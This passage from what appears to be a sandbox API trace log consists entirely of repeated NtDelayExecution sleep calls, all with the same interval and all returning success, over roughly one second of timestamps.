(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.568] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.569] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.571] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.572] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.576] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.579] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.580] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.582] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.583] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.585] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.586] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.588] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.591] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.592] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.594] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.595] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.597] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.598] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.603] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.605] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.607] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.608] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.610] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.611] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.613] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.616] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.618] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.621] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.622] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.625] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.627] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.628] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.629] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.631] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.632] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.636] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.639] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.644] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.645] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.647] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.650] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.661] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.664] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.666] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.668] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.670] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.672] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.673] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.675] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.676] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.678] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.793] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.795] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.797] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.798] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.800] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.801] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.807] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.809] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.810] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.812] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.813] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.816] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.818] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.821] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.824] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.826] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.827] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.829] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.830] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.832] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.833] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.835] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.838] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.839] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.843] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.844] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.846] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.847] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.849] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.853] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.855] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.856] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.858] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.861] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.864] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.866] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.867] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.869] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.873] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.875] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.877] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.878] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.880] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.883] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.885] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.887] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.890] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.892] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.895] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.896] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.899] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.902] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.908] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.911] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.913] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.914] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.916] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.917] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.919] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.921] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.924] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.925] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.927] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.929] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.932] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.935] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.938] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.939] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.945] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.947] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.948] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.950] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.951] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.954] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.956] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.959] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.960] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.962] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.963] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.965] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.966] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.968] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.972] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.974] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.975] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.977] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.981] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.983] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.984] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.986] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.988] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.989] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.992] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.993] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.996] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.997] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.999] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.000] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.002] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.003] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.005] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.006] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.008] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.009] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.011] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.014] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.015] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.020] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.023] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.025] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.026] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.028] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.029] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.032] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.035] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.060] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.062] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.063] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.065] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.066] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.068] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.069] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.071] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.072] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.074] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.075] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.077] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.078] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.081] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.083] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.084] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.086] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.087] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.089] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.090] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.092] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.093] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.098] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.099] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.101] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.102] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.104] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.105] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.107] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.108] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.111] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.113] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.114] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.116] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.117] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.119] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.122] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.125] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.128] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.129] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.131] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.132] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.134] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.135] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.141] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.144] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.147] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.148] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.150] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.151] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.153] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.154] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.156] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.157] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.159] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.160] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.164] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.165] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.167] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.168] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.170] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.171] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.173] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.174] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.176] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.182] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.184] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.185] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.187] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.188] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.190] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.192] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.194] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.195] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.197] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.198] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.200] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.201] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.203] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.204] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.206] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.207] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.209] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.210] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.212] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.226] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.228] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.230] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.231] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.233] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.236] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.238] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.241] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.243] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.244] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.246] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.247] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.254] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.255] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.257] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.258] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.260] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.261] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.263] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.264] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.266] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.267] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.269] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.270] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.272] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.273] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.275] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.276] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.278] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.279] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.281] NtDelayExecution 